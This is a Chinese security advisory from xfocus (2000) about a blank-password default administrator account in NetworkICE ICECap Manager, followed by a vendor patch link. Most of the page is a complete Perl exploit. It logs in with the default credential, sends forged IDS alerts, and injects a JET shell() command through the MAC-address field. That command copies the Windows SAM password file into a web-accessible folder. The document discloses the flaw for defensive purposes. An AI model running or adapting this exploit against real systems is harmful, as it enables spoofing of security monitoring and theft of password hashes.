xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

NetworkICE ICECap Manager默认用户名及密码漏洞


发布时间:2000-05-17
更新时间:2000-05-17
严重程度:
威胁程度:口令恢复
错误类型:设计错误
利用方式:服务器模式

受影响系统
Microsoft Windows NT 4.0
详细描述
导致问题的应用程序 NetworkICE ICECap Manager 2.0.23及之前的版本远程 Yes 本地 Yes ICECap Manager是一BlackICE IDS的管理控制工具。在默认情况下,它监听8081端口,而通过 8082端口来发送警告信息,但是它却有一个默认的管理员帐号iceman密码为空,这将允许远程用户通过8081端口登陆到ICECap manager并发送虚假的警告报文到8082口。 此外,ICECap Manager还有使用Microsoft Access' JET Engine 3.5的选项,因为Access' JET Engine 3.5存在一个允许远程执行vb代码的漏洞,因此远程用户可能通过这个默认的用户名及密码来做更多的侵害工作。详情可见以下链接: http://www.securityfocus.com/bid/286

测试代码
#!/usr/bin/perl
#
# RFPickaxe.pl - demo exploit for default ICECap login/alerts
# Disclaimer: I do not provide technical support for my exploits!
#
# Sorry, this requires Unix, due to the `date` call

$|=1;
use Socket;

###############################################################

# IP of ICECap system (assumes port 8082)

$Target="10.10.200.4";

# account info - uses default 'iceman' w/ no password

$account="iceman";
$httpauth="aWNlbWFuOiUzQjclQzYlRkU=";

#-------- attributes of the alert ----------

$id="100005";
$issue_name="Exploit";
$sev="1";

# spoof these

$target="0.0.0.8";
$target_dns="some.host.com";
$det_ip="0.0.0.8";
$det_nbn="SENSOR";
$int_ip="255.255.255.255";
$param="Pickaxe";

# either fake the MAC, or use it to run commands via JET vulnerability

#$det_mac="0000000000000";
$det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ".
        "c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|";

##############################################################


$inet=inet_aton($Target);

$time=`date -u "+%Y-%m-%d %T"`;
$time=~s/ /%20/g;
$time=~s/:/%3a/g;

#path is \program files\network ice\icecap\spatch\en

$alert="accountName=$account&issueID=$id&issueName=$issue_name".
        "&severity=$sev&targetNetAddress=$target&targetDNSName=".
        "$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS".
        "Name=$det_nbn&detectorMacAddress=$det_mac&".
        "intruderNetAddress=$int_ip&detectorType=3&startTime=".
        "$time&parameter=$param\r\n";

$len=length($alert);

@DXX=();
$send=<<EOT
POST / HTTP/1.0
User-Agent: netice-alerter/1.0
Host: $Target:8082
Authorization: Basic $httpauth
Content-Type: application/x-www-form-urlencoded
Content-Length: $len

EOT
;

$send=~s/\n/\r\n/g;
$send=$send.$alert;

sendraw("$send");

print @DXX;

exit;

sub sendraw {   # raw network functions stay in here
        my ($pstr)=@_;
        $PROTO=getprotobyname('tcp')||0;

        # AF_INET=2 SOCK_STREAM=1
        eval {
        alarm(30);
        if(!(socket(S,2,1,$PROTO))){ die("socket");}
        if(connect(S,pack "SnA4x8",2,8082,$inet)){
                # multi-column perl coding...don't do as I do ;)
                select(S);      $|=1;
                print $pstr;
                @DXX=<S>;
                select(STDOUT); close(S);
                alarm(0);       return;
        } else { die("not responding"); }
        alarm(0);};
        if ($@) { if ($@ =~ /timeout/){ die("Timed out!\n");}}}

解决方案
NetworkICE已经发布了ICECap Manager 2.0.23a来修正这一漏洞: 可以从以下链接获得更新版本 NetworkICE upgrade ic2023a http://update.networkice.com/cgi/ic2023a.exe?

相关信息
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved